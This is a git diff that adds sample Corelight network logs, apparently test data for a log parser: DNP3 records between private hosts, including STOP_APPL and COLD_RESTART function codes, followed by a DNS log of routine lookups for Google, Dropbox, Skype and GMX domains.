+{"ts":"2018-08-03T23:39:01.438545Z","uid":"C3mFV02HwzlCkmUQvc","id.orig_h":"10.0.0.8","id.orig_p":1184,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"STOP_APPL","fc_reply":"RESPONSE","iin":4097} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"C3mFV02HwzlCkmUQvc","id.orig_h":"10.0.0.8","id.orig_p":1184,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"STOP_APPL","fc_reply":"RESPONSE","iin":4097} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"SELECT","fc_reply":"RESPONSE","iin":4} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"SELECT","fc_reply":"RESPONSE","iin":4} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"SELECT","fc_reply":"RESPONSE","iin":4} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"SELECT","fc_reply":"RESPONSE","iin":4} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"SELECT","fc_reply":"RESPONSE","iin":4} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":6} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":6} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":6} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":6} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"CcEZtZwB5s5Aaf0C7","id.orig_h":"192.168.66.33","id.orig_p":1167,"id.resp_h":"192.168.66.34","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":6} +{"ts":"2018-08-03T23:39:01.439072Z","uid":"CTLKmv8tYC2Buh1i","id.orig_h":"10.0.0.9","id.orig_p":1084,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":38145} +{"ts":"2018-08-03T23:39:01.437568Z","uid":"CbgftA2i2rFpgx48h","id.orig_h":"10.0.0.8","id.orig_p":2803,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"COLD_RESTART","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.436247Z","uid":"CFtzZB20l6R7JprzA","id.orig_h":"10.0.0.8","id.orig_p":1159,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":256} +{"ts":"2018-08-03T23:39:01.439072Z","uid":"CTLKmv8tYC2Buh1i","id.orig_h":"10.0.0.9","id.orig_p":1084,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"STOP_APPL"} diff --git a/Sample Data/Custom/Corelight/dns_20180803_16:36:44-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/dns_20180803_16:36:44-16:40:00-0800.log_ new file mode 100644 index 0000000000..ebc843ad9d --- /dev/null +++ b/Sample Data/Custom/Corelight/dns_20180803_16:36:44-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:38:56.166833Z","uid":"CYkh2h4QkGlPf6WO56","id.orig_h":"192.168.0.54","id.orig_p":55715,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":43284,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.282623Z","uid":"CYkh2h4QkGlPf6WO56","id.orig_h":"192.168.0.54","id.orig_p":55715,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":54647,"query":"safebrowsing.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["sb.l.google.com","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154"],"TTLs":[536758.0,66.0,66.0,66.0,66.0,66.0,66.0,66.0,66.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.528493Z","uid":"CIyNRV2UeKvITQdKCa","id.orig_h":"192.168.0.54","id.orig_p":61649,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":38146,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.354140Z","uid":"CIyNRV2UeKvITQdKCa","id.orig_h":"192.168.0.54","id.orig_p":61649,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":45297,"query":"talkgadget.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["talkgadget.l.google.com","213.155.151.183","213.155.151.184","213.155.151.185","213.155.151.186","213.155.151.187","213.155.151.180","213.155.151.181","213.155.151.182"],"TTLs":[56302.0,75.0,75.0,75.0,75.0,75.0,75.0,75.0,75.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.898012Z","uid":"CUS1Rnv2rwiC9vae5","id.orig_h":"192.168.0.51","id.orig_p":6807,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":27953,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.997420Z","uid":"CE2jM12QTetzWaUdcb","id.orig_h":"192.168.0.51","id.orig_p":44883,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":20898,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.627396Z","uid":"CE2jM12QTetzWaUdcb","id.orig_h":"192.168.0.51","id.orig_p":44883,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":57132,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.902413Z","uid":"C5JUMW1eC7aXpTGVDb","id.orig_h":"192.168.0.54","id.orig_p":60396,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40046,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.044049Z","uid":"ChXIHr1BN1ZjB1BDr5","id.orig_h":"192.168.0.54","id.orig_p":58333,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":16190,"query":"ssl.gstatic.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.944913Z","uid":"Cj98rxOESCCRKaohf","id.orig_h":"192.168.0.51","id.orig_p":16600,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55103,"query":"safebrowsing-cache.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["safebrowsing.cache.l.google.com","2a00:1450:400f:804::200e"],"TTLs":[432865.0,233.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.264876Z","uid":"Cj98rxOESCCRKaohf","id.orig_h":"192.168.0.51","id.orig_p":16600,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":47061,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.274973Z","uid":"Cz3u0EAFU0GPotRCl","id.orig_h":"192.168.0.54","id.orig_p":59812,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":22389,"query":"client.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["client.v.dropbox.com","108.160.166.138"],"TTLs":[165.0,28.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.401439Z","uid":"CJrC8v2lyYRgNz6C11","id.orig_h":"192.168.0.54","id.orig_p":61307,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":15701,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:00.482678Z","uid":"CJrC8v2lyYRgNz6C11","id.orig_h":"192.168.0.54","id.orig_p":61307,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":10882,"query":"a.config.skype.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.config.skype.trafficmanager.net","skypeecs-prod-eun-0.cloudapp.net","137.116.224.167"],"TTLs":[346.0,3.0,6.0],"rejected":false} +{"ts":"2018-08-03T23:38:59.091792Z","uid":"CTBEno3R8XlJ2nrCh4","id.orig_h":"192.168.0.51","id.orig_p":63894,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":10397,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.091792Z","uid":"CTBEno3R8XlJ2nrCh4","id.orig_h":"192.168.0.51","id.orig_p":63894,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":10397,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:39:01.084537Z","uid":"CFajz22MU83P3vuWKf","id.orig_h":"192.168.0.54","id.orig_p":55918,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":18819,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.755837Z","uid":"CFajz22MU83P3vuWKf","id.orig_h":"192.168.0.54","id.orig_p":55918,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":27713,"query":"clients6.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.911523Z","uid":"CiXOC93GIZqPra2Z4e","id.orig_h":"192.168.0.54","id.orig_p":54671,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":7010,"query":"accounts.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.307960Z","uid":"CTvVFL2hcTWQ0Ge9b1","id.orig_h":"192.168.0.54","id.orig_p":63789,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":520,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["173.194.40.243","173.194.40.244","173.194.40.240","173.194.40.241","173.194.40.242"],"TTLs":[197.0,197.0,197.0,197.0,197.0],"rejected":false} +{"ts":"2018-08-03T23:39:01.092663Z","uid":"CjVhbd230MILtpSwe","id.orig_h":"192.168.0.54","id.orig_p":61838,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":55552,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.333293Z","uid":"CjVhbd230MILtpSwe","id.orig_h":"192.168.0.54","id.orig_p":61838,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":47779,"query":"mail.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlemail.l.google.com","74.125.232.117","74.125.232.118"],"TTLs":[151251.0,235.0,235.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.580648Z","uid":"CouJ2UEYgKvDRj0P4","id.orig_h":"192.168.0.51","id.orig_p":61772,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":59634,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["2a00:1450:400f:803::1014"],"TTLs":[248.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.646548Z","uid":"C2RyRK21X0hpQorRmd","id.orig_h":"192.168.0.51","id.orig_p":34116,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":17272,"query":"pop.gmx.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["212.227.17.187","212.227.17.171"],"TTLs":[63999.0,63999.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.398037Z","uid":"CuwQoG3DmbxNXnokX7","id.orig_h":"192.168.0.54","id.orig_p":58140,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":53299,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.570048Z","uid":"CTQHqR1dYMpms5571a","id.orig_h":"192.168.0.54","id.orig_p":57096,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":7653,"query":"mail.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["googlemail.l.google.com","216.58.209.101"],"TTLs":[129287.0,244.0],"rejected":false} +{"ts":"2018-08-03T23:38:58.526529Z","uid":"COJLua4jnsj59zXnl","id.orig_h":"192.168.0.54","id.orig_p":58337,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":23034,"query":"notify8.dropbox.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.410368Z","uid":"CgKgrg3tvap2uMhK31","id.orig_h":"192.168.0.54","id.orig_p":64351,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":56556,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.640163Z","uid":"CgKgrg3tvap2uMhK31","id.orig_h":"192.168.0.54","id.orig_p":64351,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":28750,"query":"chrome.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.759413Z","uid":"CgKgrg3tvap2uMhK31","id.orig_h":"192.168.0.54","id.orig_p":64351,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":46295,"query":"notify8.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["8.notify.dropbox.com","108.160.162.115","108.160.163.97","108.160.167.35","108.160.167.39","108.160.167.174","108.160.167.175"],"TTLs":[15.0,15.0,15.0,15.0,15.0,15.0,15.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.616402Z","uid":"CY2O3aUH3XjMwqQea","id.orig_h":"192.168.0.54","id.orig_p":56631,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40085,"query":"play.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.979042Z","uid":"CY2O3aUH3XjMwqQea","id.orig_h":"192.168.0.54","id.orig_p":56631,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":42335,"query":"notify8.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["8.notify.dropbox.com","108.160.169.59","108.160.169.175","108.160.169.181","108.160.169.187","108.160.170.50","108.160.169.37"],"TTLs":[45.0,45.0,45.0,45.0,45.0,45.0,45.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.391257Z","uid":"Cz7q0MV2vDXONlJV2","id.orig_h":"192.168.0.54","id.orig_p":52548,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":29828,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.919985Z","uid":"CA4li3VV721lGpeH4","id.orig_h":"192.168.0.54","id.orig_p":64142,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":34277,"query":"talkgadget.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.989161Z","uid":"CiwBJG1PbUxuKeTSO4","id.orig_h":"192.168.0.51","id.orig_p":42019,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":34271,"query":"safebrowsing.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["sb.l.google.com","213.155.151.151","213.155.151.152","213.155.151.153","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150"],"TTLs":[580433.0,96.0,96.0,96.0,96.0,96.0,96.0,96.0,96.0],"rejected":false} +{"ts":"2018-08-03T23:38:57.492704Z","uid":"CwmMhk44AMd2KBSMka","id.orig_h":"192.168.0.51","id.orig_p":42747,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":41369,"query":"safebrowsing-cache.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.243288Z","uid":"CwmMhk44AMd2KBSMka","id.orig_h":"192.168.0.51","id.orig_p":42747,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":28016,"query":"password-ned-xp.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:57.517957Z","uid":"CMBDY51DyCiSCUn4vf","id.orig_h":"192.168.0.51","id.orig_p":54416,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":4043,"query":"pop.gmx.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["212.227.17.171","212.227.17.187"],"TTLs":[9616.0,9616.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.415315Z","uid":"CMBDY51DyCiSCUn4vf","id.orig_h":"192.168.0.51","id.orig_p":54416,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":50409,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.415315Z","uid":"CMBDY51DyCiSCUn4vf","id.orig_h":"192.168.0.51","id.orig_p":54416,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":50409,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.502343Z","uid":"C1mqRMYC44LhGjPLa","id.orig_h":"192.168.0.54","id.orig_p":55206,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":27918,"query":"wpad.pwned.se","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:58.828657Z","uid":"C1mqRMYC44LhGjPLa","id.orig_h":"192.168.0.54","id.orig_p":55206,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":4042,"query":"clients6.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.773647Z","uid":"CCmMmLfWvb5HWk31g","id.orig_h":"192.168.0.54","id.orig_p":55086,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":61635,"query":"mail.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.729694Z","uid":"CdYhDw4DyWPKVyd8g7","id.orig_h":"192.168.0.51","id.orig_p":60376,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":59466,"query":"www.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.086365Z","uid":"CdYhDw4DyWPKVyd8g7","id.orig_h":"192.168.0.51","id.orig_p":60376,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":14892,"query":"safebrowsing.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["sb.l.google.com","2a00:1450:400f:803::100e"],"TTLs":[509120.0,121.0],"rejected":false} +{"ts":"2018-08-03T23:38:51.879667Z","uid":"C0NMWn3ZiKutsMCrT4","id.orig_h":"192.168.0.51","id.orig_p":41559,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":30827,"rcode":3,"rcode_name":"NXDOMAIN","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:59.959891Z","uid":"CUnG5U3Eb0RUf1uAGb","id.orig_h":"192.168.0.51","id.orig_p":30633,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":4332,"query":"safebrowsing.google.com","qclass":1,"qclass_name":"C_INTERNET","qtype":28,"qtype_name":"AAAA","AA":false,"TC":false,"RD":true,"RA":false,"Z":0,"rejected":false} +{"ts":"2018-08-03T23:38:56.591074Z","uid":"CiMysQcX2AcN5xsBa","id.orig_h":"192.168.0.54","id.orig_p":62516,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":41764,"query":"client.dropbox.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["client.v.dropbox.com","108.160.165.10"],"TTLs":[300.0,30.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.162462Z","uid":"CiMysQcX2AcN5xsBa","id.orig_h":"192.168.0.54","id.orig_p":62516,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":12049,"query":"www.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["216.58.209.132"],"TTLs":[79.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.636614Z","uid":"CA010S1WtPYj02M8xg","id.orig_h":"192.168.0.51","id.orig_p":38707,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":40014,"query":"safebrowsing.google.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["sb.l.google.com","213.155.151.154","213.155.151.155","213.155.151.148","213.155.151.149","213.155.151.150","213.155.151.151","213.155.151.152","213.155.151.153"],"TTLs":[134369.0,204.0,204.0,204.0,204.0,204.0,204.0,204.0,204.0],"rejected":false} +{"ts":"2018-08-03T23:39:00.075823Z","uid":"CA010S1WtPYj02M8xg","id.orig_h":"192.168.0.51","id.orig_p":38707,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":24368,"query":"pop.gmx.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["212.227.17.171","212.227.17.187"],"TTLs":[83869.0,83869.0],"rejected":false} +{"ts":"2018-08-03T23:38:56.763204Z","uid":"C9JkQHpCaHqGZ3J2g","id.orig_h":"192.168.0.51","id.orig_p":44811,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","trans_id":36784,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} 